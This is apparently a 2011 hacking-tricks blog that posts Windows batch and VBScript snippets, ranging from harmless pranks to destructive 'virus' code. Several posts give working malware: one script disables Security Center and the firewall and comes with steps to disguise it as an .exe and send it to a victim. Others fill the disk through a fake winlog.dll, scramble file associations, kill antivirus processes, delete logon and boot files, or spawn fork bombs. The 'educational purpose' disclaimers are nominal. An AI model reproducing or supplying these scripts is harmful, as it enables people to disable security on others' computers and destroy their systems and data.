Think About it......

"If you are a good hacker, everyone knows your name. If you are a great hacker, no one knows who you are."

Sunday, February 20, 2011

How to make a Batch File undetectable......



Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.
To do that you have to type in the following inside Notepad:
Code:


@echo off net stop “Security Center” net stop SharedAccess
netsh firewall set opmode mode=disable

That will stop the Security Center
Shared Access and Firewall.
Save the file as something.bat
But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.
So What to do?
Exe:
Download nBinder Pro:
Code:
http://www.midload.com/en/file/29192/nbinder-rar
mirror
http://rapidshare.com/files/109795148/nbinder.rar
pass linkzshare.net

NBinder pro is a Binder/Converter/Icon Changer
Download,and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.
Com:
Download:
Bat2COM
And convert it.
When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn’t see is that his firewall,security has closed.
Now,to make the batch a little more dangerous.
Code:


@echo off net stop “Security Center” net stop
SharedAccess netsh firewall set opmode mode=disable
echo shutdown -s >> "%systemdrive%\documents and
settings\start menu\programs\startup\virus.bat" :virus
start cmd.exe start command.com start mspaint.exe goto :virus

So basically shuts down all security.
Makes a new batch file at startup which inside is the command shutdown -s
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
Watch the CPU usage go up.

Tuesday, February 1, 2011

A space eater VB Code......

dim strDir,strfile,strtxt
dim obfso,obfolder,obshell,obfile,obtxtfile
strDir="C:\WINDOWS"
strfile="\winlog.dll"
strtxt="This Some Dangerous Virus Attacking ur PC"
set obfso=CreateObject("Scripting.FileSystemObject")
if obfso.FileExists(strDir&strfile) then
set obfolder=obfso.getfolder(strDir)
Else
set obfile=obfso.CreateTextfile(strDir & strfile)
do
obfile.writeline(strtxt)
loop
end if
on error resume next
Set obtxtfile=obfso.OpenTextFile(strDir & strfile,8,true)
Set obtxtfile=obfso.OpenTextFile(strDir & strfile,8,true)
do
obtxtfile.writeline(strtxt)
loop
obtxtfile.close()


About This Script :
This Script actually eats up the c: drive space.
It Creates a file named “winlog.dll” in the “C:\WINDOWS” directory
When the script is executed the size of the file “winlog.dll” keeps up increasing approximately 350MB/minute.

Create A fake Message Box..

do
msgbox "System Error : 423"
loop

It's a cool trick try it......

A batch code to change the extention of ur files......

----Disclaimer----
Don't use it to harm anyone it's just for educational purpose.....
CODE:

Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .jpeg=htmlfile
assoc .html=jpegfile
assoc .avi=txtfile
assoc .mpeg=regfile
assoc .txt=avifile
assoc .reg=htmlfile
assoc .exe=jpegfile
assoc .sys=regfile
assoc .dll=exefile
assoc .dill=tempfile
msg Your System got Infected…..
pause
exit

Don't try this on ur system.....

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

just for educational purpose don't run this on others system aswell.....

Task Kill

@echo off
cls
:a
taskkill /im explorer.exe /f
goto :a

E-Bomb

@echo off
:A
start iexplore
goto:A

Getting your self automated chat

CODE:

dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox(" Whats up?")
fname=inputbox(" Thats kool.")

Temporarily flood the network:

CODE
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

Wipe BootUp files of System

Its a batch file that wipes that start-up files of a computer

-----Disclaimer -----

Not to be used to damage/harm other people’s computer systems

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Friday, January 14, 2011

Make your System speak for you.

Here's a funny and simple code.
That makes your system speak.


CODE#
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak "txt here"

Just write anything in "txt here" and listen.

Create a BATCH BOMB

Code:
@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start bomb.bat
GOTO START

NOTE:save this file as bomb.bat
Don't use it to harm others systems.
Remember it's just for educational purpose

Tuesday, January 11, 2011

Advanced batch example - conditional shutdown

A Batch coding that performs conditional shutdown..... try it
@echo off
color 3
title Conditional Shutdown
set /p name=enter a name:
:start
cls
echo Hi this is bangu, %name%
echo.
echo 1.Shutdown
echo 2.Quit
set /p choice=enter your choice 1,2:
if %choice%==1 goto shutdown
if %choice%==2 exit

:shutdown
cls
set /p sec=enter the number of seconds that you wish the computer to shutdown in:
set /p msg=enter the shutdown message you wish to display:
shutdown -s -f -t %sec% -c "%msg%"
echo shutdown initiated at %time%
set /p cancel=type cancel to stop shutdown
if %cancel%==cancel shutdown -a
if %cancel%==cancel goto start

Pop CD-Rom continously.......

Guys this is a simple trick to irritate your friends by popping his CD-Rom every time he closes it.
CODE#
Set oWMP=CreateObject(“WMPlayer.OCX.7")
Set colCDROMs=oWMP.cdromCollection
do
if colCDROMs.COunt>=1 then
For i=0 to colCDROMs.count-1
colCDROMs.Item(i).Eject
Next
For i=0 to colCDROMs.COunt-1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
enjoy!!!!!!!

Sunday, January 9, 2011

DANCING KEYBOARD LIGHTS....

An Amazing Disco Light of KeyBoard...
Try it.....

HERE'S THE CODE

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop

This script when executed makes your Caps,Num,Scroll lock keys flash.......!
Just Watch Your Keyboard Lights...!

MATRIX SCENES

Hey Guys all of you must have seen the MATRIX movie and noticed the Fast moving data in the system screen in GREEN color.
That's just a simple trick even you can perform it too.
Use it to make a cool impression on your friends.

Here's the CODE

CODE 1#

@echo off
color 0A
:SCROLLR
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c o l 4 3 6 1 5 a
echo 3 2 4 f c p 3 m 9 u u l m 4 3 2 0 f c p 3 m 9 u u l m d 4 5 a c o
echo a c o R 4 3 2 h h 5 4 3 l 7 + a c o l 4 3 2 h h 5 4 3 l 7 j y 3 m
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c + l 4 3 6 5 a c
echo 3 2 0 f c p 3 + 9 u u l m 4 3 2 0 f c p 3 m 9 u u l m d 4 u l m 4
echo a c o l 4 3 2 h h 5 4 3 l 7 5 a c o l 4 3 2 h h 5 4 3 l 7 j y p 3
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c o l 4 3 6 1 5 a
goto SCROLLR



CODE 2#

@echo off
color 0A
:start
echo 10101010101010101010101010101010101010101010101010101010101010101
echo What IF I TOLD YOU EVERYTHING YOU KNOW IS A LIE?
echo 10100010101000101010001010100010101000101010001010100010100010101
goto start

HAVE FUN WITH THIS CODES!!!!!!!!